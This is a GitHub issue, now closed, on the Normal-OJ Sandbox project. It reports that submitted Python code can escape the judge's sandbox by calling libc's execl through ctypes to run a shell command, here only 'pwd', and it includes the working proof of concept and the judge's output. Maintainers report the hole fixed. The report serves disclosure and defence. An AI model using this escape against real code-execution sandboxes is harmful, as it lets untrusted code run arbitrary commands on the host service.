search

Normal-OJ / Sandbox

0 stars 0 forks source link

[VULN] Python Arbitrary Code Execution #7

Closed asef18766 closed 4 years ago

asef18766 commented 4 years ago

Describe the bug vulnerbility of arbitrary code execution

To Reproduce Steps to reproduce the behavior:

  1. produce the following Python code 
    
import ctypes

command = "pwd"

libc = ctypes.CDLL('libc.so.6') Cexecve=libc.execl arg0 = ctypes.create_string_buffer(10) arg1 = ctypes.create_string_buffer(10) arg2 = ctypes.create_string_buffer(10) arg3 = ctypes.create_string_buffer(len(command)+1)

arg0.value = b"/bin/sh" arg1.value = b"sh" arg2.value = b"-c" arg3.value = command.encode() Cexecve(arg0,arg1,arg2,arg3,0)

**Expected behavior**
return RE state

**Current Behavior**
return the following format response
```json
{
            "score": 0,
            "status": 1,
            "cases": [
                {
                    "stdout": "/src\n",
                    "stderr": "",
                    "exitCode": 0,
                    "execTime": 17,
                    "memoryUsage": 8412,
                    "status": 1
                }
            ]
}

Possible Solution Add Python seccomp profile or chroot it

as535364 commented 4 years ago

rules will be added in next version

as535364 commented 4 years ago

fixed